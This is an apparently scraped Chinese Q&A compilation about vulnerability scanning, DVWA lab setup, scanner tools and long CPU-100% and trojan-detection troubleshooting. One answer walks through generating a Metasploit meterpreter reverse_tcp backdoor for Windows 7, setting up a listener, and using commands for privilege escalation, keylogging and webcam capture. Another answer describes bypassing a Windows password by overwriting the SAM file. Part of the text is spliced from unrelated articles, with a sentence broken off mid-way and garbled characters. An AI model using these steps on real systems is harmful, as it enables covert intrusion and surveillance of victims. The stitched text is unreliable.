1. 如何使用Nessus掃描漏洞
Web漏洞掃描通常採用兩種策略,第一種是被動式策略,第二種是主動式策略。所謂被動式策略就是基於主機之上,對系統中不合適的設置、脆弱的口令以及其他與安全規則抵觸的對象進行檢查;而主動式策略是基於網路的,它通過執行一些腳本文件模擬對系統進行攻擊的行為並記錄系統的反應,從而發現其中的漏洞。利用被動式策略的掃描稱為系統安全掃描,利用主動式的策略掃描稱為網路安全掃描。
2. 怎樣讓外網訪問在虛擬機里搭建的DVWA滲透演練系統
思路如下:
1、將虛擬機連接到物理網路
(如果是VM虛擬機,網卡模式選擇橋接到物理網路,IP地址設置成與你電腦一個網段,網關掩碼DNS信息與你宿主電腦相同,如192.168.1.222 255.255.255.0 192.168.1.1)
至此,你的區域網可以訪問ip為192.168.1.222的虛擬機了。
2、在路由器上做埠映射
「DVWA」是個web服務吧?在路由器設置里-埠映射界面-添加一條埠映射信息。
形如這樣的條目:
然後,路由里查看一下你的WAN口ip,假如是14.209.201.115。
至此,可以通過訪問http://14.209.201.115來訪問你的虛擬機web服務。
3. 本機測試外網訪問內網虛擬機WEB!進來!詳細!高分!
我用Tomcat成功了而不是iis,首先,登錄路由以後,看一下路由的internet ip地址,用這個來訪問,然後將將路由的80埠映射到路由分配給虛擬機的區域網ip和80埠,保存。
然後用手機的瀏覽器訪問路由的internet ip地址,這樣就不用跑出去了。
4. 如何利用metasploit進行漏洞掃描和攻擊
很多朋友對使用Metasploit利用後門程序進行滲透windows7都比較感興趣,針對這些以下業內相關專家就給大家介紹下,當下黑客怎麼利用Metasploit進行滲透windows7的。設定目標主機為:cn_win7_x86_7601虛擬機,地址為:192.168.0.116;而本地主機就為:192.168.0.149。方法步驟一:黑客用Msfpayload直接生成相關的後門程序,如下圖。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149x>steup.exe方法步驟二:黑客直接就能進入所在的目錄並將屬性進行修改,換為允許以程序執行文件,詳細如下圖。進入所在目錄,修改屬性:選擇「允許以程序執行文件」,這時候也可以做一些免殺方法步驟三:接著黑客就打開msfconsole並載入exploit/multi/handler模塊並進行設置本地主機,最後就能開始進行監聽了,詳細情況如下圖。打開msfconsole,載入exploit/multi/handler模塊,設置本地主機;然後開始監聽:exploit-z-j:方法步驟四:黑客需要能將程序直接拷貝都目標主機中並進行執行。方法步驟五:以上步驟全部完成後黑客就能通過後門程序反向連接到msf,用msf就能發起第2次的攻擊然後使用客戶端也就是後門程序就能連接都服務端msf,詳細的如下圖。Meterpreter就是metasploit框架中的一個擴展模塊,因此的話溢出成功後黑客就能攻擊載荷進行使用,一旦攻擊載荷在溢出攻擊成功後就能再返回一個控制通道,這樣就能將它作為攻擊載荷成功獲得目標系統的一個meterpretershell的鏈接。另外,附meterpreter常用命令:getsystem#會自動利用各種各樣的系統漏洞來進行許可權提升migrate#進程id進程遷移background#把當前的會話設置為背景,需要的時候在啟用getuid#查看對方正在運行的用戶ps#列出所有的進程getpid#返回運行meterpreter的id號sysinfo#產看系統信息和體系結構shell#切換到cmd的系統許可權方式exit#退出shell會話返回meterpreter或終止meterpretergetdesktop截取目標主機當前桌面會話窗口runwebcam-p/var/www#在/var/www目錄監控目標主機的攝像頭keylog_recorder#使用migrate將會話遷移至explorer.exe的進程空間後記錄鍵盤
5. 在虛擬機上新裝的Linux系統上安裝nessus能掃描出漏洞嗎
只要這個版本的Linux系統存在漏洞,沒有修復的話,當然會掃描出漏洞的。不管是實體機還是虛擬機都一樣。
6. 如何對網站進行病毒和漏洞檢查
相信你的一定遇到過電腦動彈不得的時候,或許是只能眼看滑鼠滑動而不能進行任何操作的時候,很多人都會經常遇到這樣的問題:CPU佔用率100%改如何解決,本文將從多個角度給你全方面的解析,希望閱讀完本文希望在今後你遇到問題的時候能夠帶給你一些幫助
1、驅動沒有經過認證,造成CPU資源佔用100%。
大量的測試版的驅動在網上泛濫,造成了難以發現的故障原因。
2、殺毒軟體CPU使用率佔用100%
現在的殺毒軟體一般都加入了,對網頁、郵件、個人隱私的即時監空功能,這樣無疑會加大系統的負擔。比如:在玩游戲的時候,會非常緩慢。關閉該殺毒軟體是解決得最直接辦法。
3、病毒、木馬造成。
出現CPU佔用率100%
的故障經常是因為病毒木馬造成的,比如震盪波病毒。應該首先更新病毒庫,對電腦進行全機掃描
。接著,在使用反間諜軟體Ad—Aware,檢查是否存在間諜軟體。論壇上有不少朋友都遇到過svchost.exe佔用CPU100%,這個往往是中毒的表現。
svchost.exe
Windows中的系統服務是以動態鏈接庫(DLL)的形式實現的,其中一些會把可執行程序指向svchost.exe,由它調用相應服務的動態鏈接庫並加上相應參數來啟動服務。正是因為它的特殊性和重要性,使它更容易成為了一些病毒木馬的宿主。
大量的蠕蟲病毒在系統內部迅速復制,造成CPU佔用資源率據高不下。解決辦法:使用最新的殺毒軟體在DOS模式下進行殺毒。經常性更新升級殺毒軟體和防火牆,加強防毒意識,掌握正確的防殺毒知識。
4、開始->運行->msconfig->啟動,關閉不必要的啟動項,重啟。
5、網路連接導致CPU使用率佔用100%
查看網路連接。主要是網卡。當你的Windows2000/xp作為伺服器時,收到來自埠445上的連接請求後,系統將分配內存和少量CPU資源來為這些連接提供服務,當負荷過重,就會出現上述情況。要解決這個問題可以通過修改注冊表來解決,打開注冊表,找到HKEY—LOCAL—MACHNE\SYSTEM\CurrentControlSet\Services\lanmanserver,在右面新建一個名為";maxworkitems";的DWORD值.然後雙擊該值,如果你的電腦有512以上內存,就設置為";1024";,如果小於512,就設置為256.
6、查看「svchost」進程
Svchost.exe是Windows
XP系統的一個核心進程。Svchost.exe不單單只出現在Windows
XP中,在使用NT內核的Windows系統中都會有Svchost.exe的存在。一般在Windows
2000中Svchost.exe進程的數目為2個,而在Windows
XP中Svchost.exe進程的數目就上升到了4個及4個以上。
如何才能辨別哪些是正常的Svchost.exe進程,而哪些是病毒進程呢?
Svchost.exe的鍵值是在「HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Svchost」,每個鍵值表示一個獨立的Svchost.exe組。
微軟還為我們提供了一種察看系統正在運行在Svchost.exe列表中的服務的方法。以Windows
XP為例:在「運行」中輸入:cmd,然後在命令行模式中輸入:tasklist
/svc。系統列出服務列表。如果使用的是Windows
2000系統則把前面的「tasklist /svc」命令替換為:「tlist
-s」即可。
如果你懷疑計算機有可能被病毒感染,Svchost.exe的服務出現異常的話通過搜索Svchost.exe文件就可以發現異常情況。一般只會找到一個在:「C:\Windows\System32」目錄下的Svchost.exe程序。如果你在其他目錄下發現Svchost.exe程序的話,那很可能就是中毒了。
還有一種確認Svchost.exe是否中毒的方法是在任務管理器中察看進程的執行路徑。但是由於在Windows系統自帶的任務管理器不能察看進程路徑,所以要使用第三方的進程察看工具。
上面簡單的介紹了Svchost.exe進程的相關情況。總而言之,Svchost.exe是一個系統的核心進程,並不是病毒進程。但由於Svchost.exe進程的特殊性,所以病毒也會千方百計的入侵Svchost.exe。通過察看Svchost.exe進程的執行路徑可以確認是否中毒。
7、把網卡、顯卡、音效卡卸載,然後重新安裝一下驅動。
8、重裝系統、常用軟體、當然也要裝驅動。
用幾天看一下,若不會出現這種問題,再裝上其他軟體,但是最好是一個軟體裝完,先用幾天。出現問題再接著裝!
特徵:伺服器正常CPU消耗應該在75%以下,而且CPU消耗應該是上下起伏的,出現這種問題的伺服器,CPU會突然一直處100%的水平,而且不會下降。查看任務管理器,可以發現是DLLHOST.EXE消耗了所有的CPU空閑時間,
管理員在這種情況下,只好重新啟動IIS服務,奇怪的是,重新啟動IIS服務後一切正常,但可能過了一段時間後,問題又再次出現了。
直接原因:
有一個或多個ACCESS資料庫在多次讀寫過程中損壞,微軟的MDAC系統在寫入這個損壞的ACCESS文件時,ASP線程處於BLOCK狀態,結果其它線程只能等待,IIS被死鎖了,全部的CPU時間都消耗在DLLHOST中。
解決辦法:
安裝「一流信息監控攔截系統」,使用其中的「首席文件檢查官IIS健康檢查官」軟體,
啟用」查找死鎖模塊」,設置:
--wblock=yes
監控的目錄,請指定您的主機的文件所在目錄:
--wblockdir=d:\test
監控生成的日誌的文件保存位置在安裝目錄的log目錄中,文件名為:logblock.htm
停止IIS,再啟動「首席文件檢查官IIS健康檢查官」,再啟動IIS,「首席文件檢查官IIS健康檢查官」會在logblock.htm中記錄下最後寫入的ACCESS文件的。
過了一段時間後,當問題出來時,例如CPU會再次一直處100%的水平,可以停止IIS,檢查logblock.htm所記錄的最後的十個文件,注意,最有問題的往往是計數器類的ACCESS文件,例如:」**COUNT.MDB」,」**COUNT.ASP」,可以先把最後十個文件或有所懷疑的文件刪除到回收站中,再啟動IIS,看看問題是否再次出現。我們相信,經過仔細的查找後,您肯定可以找到這個讓您操心了一段時間的文件的。
找到這個文件後,可以刪除它,或下載下來,用ACCESS2000修復它,問題就解決了。
要通過進程列表查看系統是否染毒,必須打開當前的執行程序進程列表,Microsoft的每種系統都有相應的打開方法,但能夠顯示的能力卻因(系統)不同,有所差異:
1.Windows 98 /Me系統
打開系統進程的方式很簡單,快捷鍵「Ctrl+Alt+Delete」(如圖1),這個窗口大家應該比較熟悉,使用Windows系統的用戶都知道用這個方法來關閉程序,不過它同樣用於顯示系統進程,只是Windows
98系統較初級,對進程的顯示局限於名稱,且裡面所顯示的還有打開的文件及目錄名,查看時易混淆。Windows
Me的進程打開方式和Windows 98相同。
Windows
9X系統打開的進程列表混亂且不完全,顯然不便於查看系統的具體進程狀況,所以建議使用一些工具程序來為Windows
9x系統顯示進程,如「Windows優化大師」,在「優化大師」的「系統安全優化」項內打開「進程管理」,在圖2所示的「Windows
進程管理」窗口內,可以詳細查看當前計算機所運行的所有進程,及具體程序所在的位置,這樣更方便完成後面要介紹的如何利用進程進行查毒、殺毒。
2.Windows 2000/ XP/2003系統
Windows 2000、Windows XP、Windows
2003打開進程窗口的方式與Windows
9x系統相同,只是三鍵後打開的是「Windows
任務管理器」窗口,需要選擇裡面的「進程」項。Windows
2000系統只顯示具體進程的全名,佔用的內存量;Windows
XP、Windows 2003系統相比Windows
2000會顯示該進程歸屬於那個用戶下,如操作系統所必須的基礎程序,會在後面的「用戶名」內顯示為「SYSTEM」,由用戶另外開啟的程序則用戶名為當前的系統登錄用戶名。
經進程發現病毒
在介紹具體的查毒和殺毒前,筆者先回答開篇提出的兩個問題。為什幺殺毒軟體並不能全面的查找和殺掉病毒?
首先,病毒防火牆是通過對程序進行反匯編,然後與自己的病毒庫進行對比來查找病毒,如果病毒較新,而殺毒軟體又未能及時升級便不能識別病毒。
其次,殺毒軟體在發現病毒後,如果是獨立的可執行病毒程序,會選擇直接刪除的處理方式,而病毒如果被當作進程執行了,殺毒軟體就無能為力了,因為它沒有功能和許可權先停止掉系統的這些進程,被當作進程執行的程序是不能被刪除的(這也是大家在刪除一個程序時,提示該程序正在被使用不能刪除的原因)。所以在使用殺毒軟體殺毒時,才會有殺毒完成後,又出現病毒提示的原因。
回到原來話題上!
通過進程如何發現和殺掉病毒呢?
由前面的知識介紹可知,Windows 9X和Windows
2000系統只能顯示進程的名稱,這對判斷該進程是否是病毒還不夠,如果要准確的斷定病毒,最好使用前面介紹的「Windows優化大師」來查看進程程序的源路徑。
如果是「C:\Windows\system」下的一些未知的「EXE」那便極有病毒的可能性了。Windows
XP和Windows
2003系統,進程後會有「用戶名」的顯示,病毒是不可能獲得「SYSTEM」許可權的,所以應注意「用戶名」是當前登錄用戶的進程,一旦發現是病毒,可以立即「殺掉」。這里介紹兩個技巧:
1.發現可疑進程後,利用Windows的查找功能,查找該進程所在的具體路徑,通過路徑可以知道該進程是否合法,譬如由路徑「C:\Program
Files21\assistse.exe」知道該程序是3721的進程,是合法的。
2.在對進程是否病毒拿不定主意時,可以復制該進程的全名,如:「xxx.exe」到googl.com或.com這樣的全球搜查引擎上進行搜查,如果是病毒會有相關的介紹網頁。
確定了該進程是病毒,首先應該殺掉該進程,對於Windows
9x系統,選中該進程後,點擊下面的「結束任務」按鈕,Windows
2000、Windows XP、Windows
2003系統則在進程上單擊右鍵在彈出菜單上選擇「結束任務」。「殺掉」進程後找到該進程的路徑刪除掉即可,完成後最好在進行一次殺毒,這樣就萬無一失了。
在win.ini文件中,在[Windows]下面,「run=」和「load=」是可能載入「木馬」程序的途徑,必須仔細留心它們。一般情況下,它們的等號後面什幺都沒有,如果發現後面跟有路徑與文件名不是你熟悉的啟動文件,你的計算機就可能中上「木馬」了。當然你也得看清楚,因為好多「木馬」,如「AOL
Trojan木馬」,它把自身偽裝成command.exe文件,如果不注意可能不會發現它不是真正的系統啟動文件。
在system.ini文件中,在[BOOT]下面有個「shell=文件名」。正確的文件名應該是「explorer.exe」,如果不是「explorer.exe」,而是「shell=
explorer.exe
程序名」,那幺後面跟著的那個程序就是「木馬」程序,就是說你已經中「木馬」了。
在注冊表中的情況最復雜,通過regedit命令打開注冊表編輯器,在點擊至:「HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run」目錄下,查看鍵值中有沒有自己不熟悉的自動啟動文件,擴展名為EXE。
這里切記:有的「木馬」程序生成的文件很像系統自身文件,想通過偽裝矇混過關,如「Acid
Battery
v1.0木馬」,它將注冊表「HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run」下的Explorer
鍵值改為Explorer=「C:\Windows\expiorer.exe」,「木馬」程序與真正的Explorer之間只有「i」與「l」的差別。
當然在注冊表中還有很多地方都可以隱藏「木馬」程序,如:「HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run」、「HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run」的目錄下都有可能,最好的辦法就是在「HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run」下找到「木馬該病毒也稱為「Code
Red
II(紅色代碼2)」病毒,與早先在西方英文系統下流行「紅色代碼」病毒有點相反,在國際上被稱為VirtualRoot(虛擬目錄)病毒。該蠕蟲病毒利用Microsoft已知的溢出漏洞,通過80埠來傳播到其它的Web頁伺服器上。受感染的機器可由黑客們通過Http
Get的請求運行scripts/root.exe來獲得對受感染機器的完全控制權。
當感染一台伺服器成功了以後,如果受感染的機器是中文的系統後,該程序會休眠2天,別的機器休眠1天。當休眠的時間到了以後,該蠕蟲程序會使得機器重新啟動。該蠕蟲也會檢查機器的月份是否是10月或者年份是否是2002年,如果是,受感染的伺服器也會重新啟動。
當Windows NT系統啟動時,NT系統會自動搜索C盤根目錄下的文件explorer.exe,受該網路蠕蟲程序感染的伺服器上的文件explorer.exe也就是該網路蠕蟲程序本身。該文件的大小是8192位元組,VirtualRoot網路蠕蟲程序就是通過該程序來執行的。同時,VirtualRoot網路蠕蟲程序還將cmd.exe的文件從Windows
NT的system目錄拷貝到別的目錄,給黑客的入侵敞開了大門。
它還會修改系統的注冊表項目,通過該注冊表項目的修改,該蠕蟲程序可以建立虛擬的目錄C或者D,病毒名由此而來。值得一提的是,該網路蠕蟲程序除了文件explorer.exe外,其餘的操作不是基於文件的,而是直接在內存中來進行感染、傳播的,這就給捕捉帶來了較大難度。
程序的文件名,再在整個注冊表中搜索即可。
我們先看看微軟是怎樣描述svchost.exe的。在微軟知識庫314056中對svchost.exe有如下描述:svchost.exe
是從動態鏈接庫 (DLL) 中運行的服務的通用主機進程名稱。
其實svchost.exe是Windows
XP系統的一個核心進程。svchost.exe不單單只出現在Windows
XP中,在使用NT內核的Windows系統中都會有svchost.exe的存在。一般在Windows
2000中svchost.exe進程的數目為2個,而在Windows
XP中svchost.exe進程的數目就上升到了4個及4個以上。所以看到系統的進程列表中有幾個svchost.exe不用那幺擔心。
svchost.exe到底是做什麼用的呢?
首先我們要了解一點那就是Windows系統的中的進程分為:獨立進程和共享進程這兩種。由於Windows系統中的服務越來越多,為了節約有限的系統資源微軟把很多的系統服務做成了共享模式。那svchost.exe在這中間是擔任怎樣一個角色呢?
svchost.exe的工作就是作為這些服務的宿主,即由svchost.exe來啟動這些服務。svchost.exe只是負責為這些服務提供啟動的條件,其自身並不能實現任何服務的功能,也不能為用戶提供任何服務。svchost.exe通過為這些系統服務調用動態鏈接庫(DLL)的方式來啟動系統服務。
svchost.exe是病毒這種說法是任何產生的呢?
因為svchost.exe可以作為服務的宿主來啟動服務,所以病毒、木馬的編寫者也挖空心思的要利用svchost.exe的這個特性來迷惑用戶達到入侵、破壞計算機的目的。
如何才能辨別哪些是正常的svchost.exe進程,而哪些是病毒進程呢?
svchost.exe的鍵值是在「HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
NT\CurrentVersion\Svchost」,每個鍵值表示一個獨立的svchost.exe組。
微軟還為我們提供了一種察看系統正在運行在svchost.exe列表中的服務的方法。以Windows
XP為例:在「運行」中輸入:cmd,然後在命令行模式中輸入:tasklist
/svc。系統列出如圖2所示的服務列表。圖2中紅框包圍起來的區域就是svchost.exe啟動的服務列表。如果使用的是Windows
2000系統則把前面的「tasklist /svc」命令替換為:「tlist
-s」即可。如果你懷疑計算機有可能被病毒感染,svchost.exe的服務出現異常的話通過搜索svchost.exe文件就可以發現異常情況。一般只會找到一個在:「C:\Windows\System32」目錄下的svchost.exe程序。如果你在其它目錄下發現svchost.exe程序的話,那很可能就是中毒了。
還有一種確認svchost.exe是否中毒的方法是在任務管理器中察看進程的執行路徑。但是由於在Windows系統自帶的任務管理器不能察看進程路徑,所以要使用第三方的進程察看工具。
上面簡單的介紹了svchost.exe進程的相關情況。總而言之,svchost.exe是一個系統的核心進程,並不是病毒進程。但由於svchost.exe進程的特殊性,所以病毒也會千方百計的入侵svchost.exe。通過察看svchost.exe進程的執行路徑可以確認是否中毒。
症狀
在基於 Windows 2000 的計算機上,Services.exe 中的
CPU 使用率可能間歇性地達到100
%,並且計算機可能停止響應(掛起)。出現此問題時,連接到該計算機(如果它是文件伺服器或域控制器)的用戶會被斷開連接。您可能還需要重新啟動計算機。如果
Esent.dll 錯誤地處理將文件刷新到磁碟的方式,則會出現此症狀。
解決方案
Service Pack 信息
要解決此問題,請獲取最新的 Microsoft Windows 2000
Service Pack。有關其它信息,請單擊下面的文章編號,以查看
Microsoft 知識庫中相應的文章:
260910 如何獲取最新的 Windows 2000 Service
Pack
修復程序信息
Microsoft
提供了受支持的修補程序,但該程序只是為了解決本文所檣艿奈侍狻V揮屑撲慊�齙獎疚奶岬降奶囟ㄎ侍饈輩趴捎τ么誦薏鉤絛頡4誦薏鉤絛蚩贍芑夠嶠郵芷淥�恍┎饈浴R虼耍�綣�飧鑫侍餉揮卸閱�斐裳現氐撓跋歟琈icrosoft
建議您等待包含此修補程序的下一個 Windows 2000 Service
Pack。
要立即解決此問題,請與「Microsoft 產品支持服務」聯系,以獲取此修補程序。有關「Microsoft
產品支持服務」電話號碼和支持費用信息的完整列表,請訪問
Microsoft Web 站點:
注意 :特殊情況下,如果 Microsoft
支持專業人員確定某個特定的更新程序能夠解決您的問題,可免收通常情況下收取的電話支持服務費用。對於特定更新程序無法解決的其它支持問題和事項,將正常收取支持費用。
下表列出了此修補程序的全球版本的文件屬性(或更新的屬性)。這些文件的日期和時間按協調通用時間
(UTC) 列出。查看文件信息時,它將轉換為本地時間。要了解 UTC
與本地時間之間的時差,請使用「控制面板」中的「日期和時間」工具中的 時區
選項卡。
狀態
Microsoft 已經確認這是在本文開頭列出的 Microsoft
產品中存在的問題。此問題最初是在 Microsoft Windows 2000
Service Pack 4 中更正的。
explorer.exe進程造成CPU使用率佔用100%
在system.ini文件中,在[BOOT]下面有個「shell=文件名」。正確的文件名應該是「explorer.exe」,如果不是「explorer.exe」,而是「shell=
explorer.exe
程序名」,那幺後面跟著的那個程序就是「木馬」程序,就是說你已經中「木馬」了。
在注冊表中的情況最復雜,通過regedit命令打開注冊表編輯器,在點擊至:「HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run」目錄下,查看鍵值中有沒有自己不熟悉的自動啟動文件,擴展名為EXE,這里切記:有的「木馬」程序生成的文件很像系統自身文件,想通過偽裝矇混過關,如「Acid
Battery
v1.0木馬」,它將注冊表「HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run」下的
Explorer
鍵值改為Explorer=「C:\Windows\expiorer.exe」,「木馬」程序與真正的Explorer之間只有「i」與「l」的差別。當然在注冊表中還有很多地方都可以隱藏「木馬」程序,如:「HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run」、「HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run」的目錄下都有可能,最好的辦法就是在「HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run」下找到「木馬」程序的文件名,再在整個注冊表中搜索即可。
超線程導致CPU使用率佔用100%
這類故障的共同原因就是都使用了具有超線程功能的P4
CPU。我查找了一些資料都沒有明確的原因解釋。據一些網友總結超線程似乎和天網防火牆有沖突,可以通過卸載天網並安裝其它防火牆解決,也可以通過在BIOS中關閉超線程功能解決。
AVI視頻文件造成CPU使用率佔用100%
在Windows XP中,單擊一個較大的AVI視頻文件後,可能會出現系統假死現象,並且造成exploere.exe進程的使用率100%,這是因為系統要先掃描該文件,並檢查文件所有部分,建立索引。如果文件較大就會需要較長時間並造成CPU佔用率100%。解決方法:右鍵單擊保存視頻文件的文件夾,選擇」屬性—>常規—>高級「,去掉」為了快速搜索,允許索引服務編制該文件夾的索引「前面復選框的對鉤即可。
處理較大的Word文件時CPU使用率過高
上述問題一般還會造成電腦假死,這些都是因為WORD的拼寫和語法檢查造成的,只要打開WORD的「工具—選項」,進入「拼寫和語法」選項卡,將其中的「鍵入時檢查拼寫」和「鍵入時檢查語法」兩項前面的復選框中的鉤去掉即可。
正常軟體造成CPU使用率佔用100%
首先,如果是從開機後就發生上述情況直到關機。那幺就有可能是由某個隨系統同時登陸的軟體造成的。可以通過運行輸入「msconfig」打開「系統實用配置工具」,進入「啟動」選項卡。接著,依次取消可疑選項前面的對鉤,然後重新啟動電腦。反復測試直到找到造成故障的軟體。或者可以通過一些優化軟體如「優化大師」達到上述目的。另:如果鍵盤內按鍵卡住也可能造成開機就出現上述問題。
如果是使用電腦途中出項這類問題,可以調出任務管理器(WINXP
CTRL+ALT+DEL WIN2000 CTRL+SHIFT「ESC),進入」進程「選項卡,看」CPU「欄,從裡面找到佔用資源較高的程序(其中SYSTEM
IDLE
PROCESS是屬於正常,它的值一般都很高,它的作用是告訴當前你可用的CPU資源是多少,所以它的值越高越好)通過搜索功能找到這個進程屬於哪個軟體。然後,可以通過升級、關閉、卸載這個軟體或者乾脆找個同類軟體替換,問題即可得到解決。
參考資料:http://unames.ystalk.com/bbs/read.php?tid=441
7. 如何使用appscan進行web service掃描
在使用AppScan工具對WEBService機器進行掃描的時候,經常會發現Tomcat的日誌記錄中會有異常信息(本文以Tomcat伺服器為例):
ERROR: transport error 202: handshake failed - received >GET /manaager/< - excepted >JDWP-Handsh
ake< ["transport.c",L41]
JDWP exit error JVMTI_ERROR_NONE(0): could not connect, timeout or fatal error
再一檢查Tomcat進程,無故停止,使得整個WEBService當機,影響整個系統環境。
問題分析
通過網上查詢錯誤信息,發現是Tomcat服務開啟了JPDA功能。而在進行AppScan掃描的同時,也會覆蓋到JPDA的埠。此埠是用來進行
Socket連接的,主要目的是用來對Java程序進行遠程調試,一旦該埠被佔用,則JVM在此監聽埠上則會被掛起,導致整個Java程序中斷,這就
是根因所在。只要關閉JPDA功能即可。
操作步驟:
Step 1:編輯TOMCAT目錄/bin下的startup.sh文件;
Step 2:修改最後一行,將exec "$PRGDIR"/"$EXECUTABLE" jpda start "$@"中的" jpda "刪除(注意,前後要加空格);
Step 3:保存後,重啟startup.sh;
附:JPDA所開啟的監聽埠在TOMCAT目錄/bin下的catalina.sh文件配置,搜索該文件的「JDPA_ADDRESS=」字樣,其值便是埠號。
這里對JPDA作一個簡單的介紹。
JVM提供了一個調試架構對Java程序進行調試的功能,這就是JPDA(Java Platform. Debugger ArchitectureJava平台調試架構),JPDA通過調試交互協議向JVM請求服務以及對JVM中運行的程序進行調試。
JPDA通過兩個介面和協議來完成如上功能,分別是JVMTI(Java虛擬機工具介面),JDI(Java調試介面)和JDWP(Java調試連線協議)。其中
1)JVMTI定義了虛擬機應該提供的調試服務,包括調試信息(Information譬如棧信息)、調試行為(Action譬如客戶端設置一個斷點)
和通知(Notification譬如到達某個斷點時通知客戶端),該介面由虛擬機實現者提供實現,並結合在虛擬機中;
2)JDI在語言的高層次上定義了調試者可以使用的調試介面以能方便地與遠程的調試服務進行交互,Java語言實現,調試器實現者可直接使用該介面訪問虛擬機調試服務;
3)JDWP定義調試服務和調試器之間的通信,包括定義調試信息格式和調試請求機制。
JPDA 概念將調試過程分為兩部分:被調試的程序(被調試者-debuggee)和JDI。JDI一般為一個調試應用程序的用戶介面(或Java
IDE的一部分)。被調試的應用程序在後端運行,而JDI在前端運行。在前端與後端之間有一個通信通道運行JDWP協議;因此,被調試程序與調試器可以位
於同一個系統內,也可位於不同的系統中。調試器的後端負責由調試器前端向被調試者VM傳輸請求,如「告訴我變數X的值」;它還負責向前端傳輸對這些請求
(包括像到達斷點之類的預計事件)的響應。後端與前端利用JDWP通過一個通信通道進行通信。後端與被調試者VM利用JVMTI進行通信。
8. 有沒有好用的漏洞掃描工具
1、OpenVAS漏洞掃描工具
OpenVAS漏洞掃描器是一種漏洞分析工具,由於其全面的特性,IT部門可以使用它來掃描伺服器和網路設備。
這些掃描器將通過掃描現有設施中的開放埠、錯誤配置和漏洞來查找IP地址並檢查任何開放服務。掃描完成後,將自動生成報告並以電子郵件形式發送,以供進一步研究和更正。
OpenVAS也可以從外部伺服器進行操作,從黑客的角度出發,從而確定暴露的埠或服務並及時進行處理。如果您已經擁有一個內部事件響應或檢測系統,則OpenVAS將幫助您使用網路滲透測試工具和整個警報來改進網路監控。
2、Nessus漏洞掃描工具
Tenable的Nessus
Professional是一款面向安全專業人士的工具,負責修補程序、軟體問題、惡意軟體和廣告軟體刪除工具,以及各種操作系統和應用程序的錯誤配置。
Nessus提供了一個主動的安全程序,在黑客利用漏洞入侵網路之前及時識別漏洞,同時還處理遠程代碼執行漏洞。
它關心大多數網路設備,包含虛擬、物理和雲基礎架構。Tenable還被認為是Gartner Peer
Insights在2003年3月之前進行危險性評估的首選方案。
3、Nexpose community
Nexpose community是由Rapid7開發的漏洞掃描工具,它是涵蓋了大多數網路檢查的開源解決方案。
這個解決方案的多功能性是IT管理員的一個優勢,它可以被整合到一個Metaspoit框架中,能夠在任何新設備訪問網路時檢測和掃描設備。
它還可以監控真實世界中的漏洞暴露,最重要的是,它可以進行相應的修復。此外,漏洞掃描程序還可以對威脅進行風險評分,范圍在1-1000之間,從而為安全專家在漏洞被利用之前修復漏洞提供了便利。Nexpose目前可免費試用一年。
4、Nikto
Nikto是另一個免費的在線漏洞掃描工具,如Nexpose community。
Nikto可幫助您了解伺服器功能,檢查其版本,在網路伺服器上進行測試以識別威脅和惡意軟體的存在,並掃描不同的協議,如https、httpd、http等。
還有助於在短時間內掃描伺服器的多個埠,Nikto因其效率和伺服器強化功能而受到青睞。
5、Retina
Retina漏洞掃描工具是基於Web的開源軟體,從中心位置負責漏洞管理。它的功能包括修補、合規性、配置和報告。
負責資料庫、工作站、伺服器分析和Web應用程序,完全支持VCenter集成和應用程序掃描虛擬環境;它負責多個平台,提供完整的跨平台漏洞評估和安全性。
9. 在虛擬機windows server2003怎樣掃描別人的漏洞
先把虛擬機里的XP系統電源關了,然後打開工具欄上的VM->Settings,選中Hard Disk,在右邊出現了Utilities的一個下拉欄,OK,點擊它選擇Map,這時彈出一個「Map Virtual Disk」窗口,選擇系統分區,將「Open file in read-only mode」的默認選擇去掉,這時會有個警告的提示框,提醒我們不要亂來,否則黎叔會很生氣的哦^_^。沒關系,我們只是改改密碼而已,不用理它。好了,點擊OK進入映射盤中,噢耶,看到了虛擬系統中的系統盤。接下來就是老一套了,我的映射盤符是z:,所以拷貝z:\windows\repair下的sam覆蓋z:\windows\system32\config\sam,關閉z盤,再進入VM設置中,disconnect映射,打開電源,開機,OK不用輸入密碼順利進入了系統。